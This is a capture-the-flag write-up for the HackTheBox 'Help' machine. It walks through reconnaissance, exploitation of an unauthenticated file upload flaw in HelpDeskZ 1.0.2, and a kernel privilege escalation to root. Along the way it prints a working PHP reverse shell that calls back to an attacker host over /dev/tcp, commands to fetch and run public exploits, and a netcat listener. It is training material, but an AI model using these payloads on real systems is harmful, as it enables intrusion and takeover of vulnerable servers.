HackTheBox - Help
| Field | Details |
|---|---|
| OS | Linux |
| Difficulty | Easy |
| Release Date | 2019-01-19 |
| Pwned Date | 2026-05-19 |
| Tags | File Upload Vulnerability CVE-2017-16995 HelpDeskZ ffuf |
Summary
Help is an Easy Linux box which has an unauthenticated arbitrary file upload that can be exploited to get RCE. Then the kernel is found to be vulnerable and can be exploited to get a root shell.
Reconnaissance
Start with a general sweep of all TCP ports
nmap -p- --min-rate 5000 -oN all_tcp_ports.txt TARGET_IP
[snip]
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3000/tcp open ppp
[snip]
Run a more targeted service scan on detected ports
nmap -sC -sV -p 22,80,3000 -oN service_scan.txt TARGET_IP
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
| 256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_ 256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp open http Apache httpd 2.4.18
|_http-title: Did not follow redirect to http://help.htb/
|_http-server-header: Apache/2.4.18 (Ubuntu)
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Notice the apache server running on port 80. Browsing directly to TARGET_IP causes a redirect to a help.htb domain. Add the following line to the /etc/hosts file to correctly resolve the domain:
TARGET_IP help.htb
Browsing to http://help.htb shows the standard ‘it works’ apache page. Subdirectory enumeration will disclose additional pages:
ffuf -u http://help.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt
[snip]
support [Status: 301, Size: 306, Words: 20, Lines: 10, Duration: 24ms]
[snip]
http://help.htb/support/ presents a help desk web application named HelpDeskZ. Browsing to http://help.htb/support/README.md is possible to determine the version:
Version: 1.0.2 from 1st June 2015
Looking for the README.md file is not a random decision. The logic is this: since the HelpDeskZ project is opensource, look for the github repo (https://github.com/helpdesk-z/helpdeskz-dev). In the repo search for files that contains version information. Then check if those files are available in the installed instance. In this specific case the README.md file contains version info AND is available on the target installation.
HelpDeskZ v1.0.2 has a known arbitrary file upload vulnerability. See https://www.exploit-db.com/exploits/40300 for more information.
This vulnerability allows to upload and trigger a reverse php shell on the target, getting user access.
Foothold
Create a ‘reverse.php’ file with the following content
<?php system("bash -c 'bash -i >& /dev/tcp/YOUR_IP/9001 0>&1'"); ?>
The reverse shell will be uploaded using the ‘Submit a Ticket’ feature of the app, which is available to the unauthenticated user.
Before doing the upload part is useful to understand how the exploit works.
The app verify the attachments uploaded by the user, any php file is rejected and the user is notified with a ‘File not allowed’ type of message. The issue is that the file is moved on the server before verification takes place and the name of the uploaded file is changed to a md5 hash. Even if the file is later rejected it is still on the machine. Since the md5 hash name of the file depends on the time of upload the exploit tries to guess the file name with multiple attempts in order to trigger it. For this reason the exploit is time-sensitive and it should be run immediately after the upload.
Get the exploit and make it executable
curl -o helpdeskz_exploit.py https://www.exploit-db.com/download/40300
chmod 770 helpdeskz_exploit.py
Listen on attacking machine for incoming connections
nc -lnvp 9001
Upload the reverse.php file and quickly run
python2 helpdeskz_exploit.py http://help.htb/support/uploads/tickets/ reverse.php
A connection should be established on port 9001
listening on [any] 9001 ...
connect to [10.10.14.50] from (UNKNOWN) [10.129.230.159] 42270
bash: cannot set terminal process group (733): Inappropriate ioctl for device
bash: no job control in this shell
help@help:/var/www/html/support/uploads/tickets$
A shell to the target with the ‘help’ user was established.
Privilege Escalation
Look at the kernel version
uname -a
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
Kernel version 4.4.0-116 is vulnerable to local privilege escalation. See https://www.exploit-db.com/exploits/44298 for more information.
Retrieve the exploit code using searchsploit
searchsploit -m 44298
This command will copy the exploit file 44298.c to the current working directory.
The exploit will be compiled directly on the target for maximum compatibility.
Run a python server from the directory where the exploit file is located
python -m http.server
Fetch the 44298.c file on the target machine
wget http://YOUR_IP:8000/44298.c
Build the exploit
gcc 44298.c -o exploit
Run the exploit
./exploit
The exploit should spawn a shell without a nice prompt but with root access
./exploit
whoami
root
Got root access.
Note: this box also has a GraphQL endpoint (port 3000) which can be enumerated to get a set of credentials for the HelpDesk software. The software is vulnerable to blind SQL injection which can be exploited to get a password for SSH Login. This vulnerability requires authenticated access, hence the credentials. This writeup took the ‘unauthenticated’ route.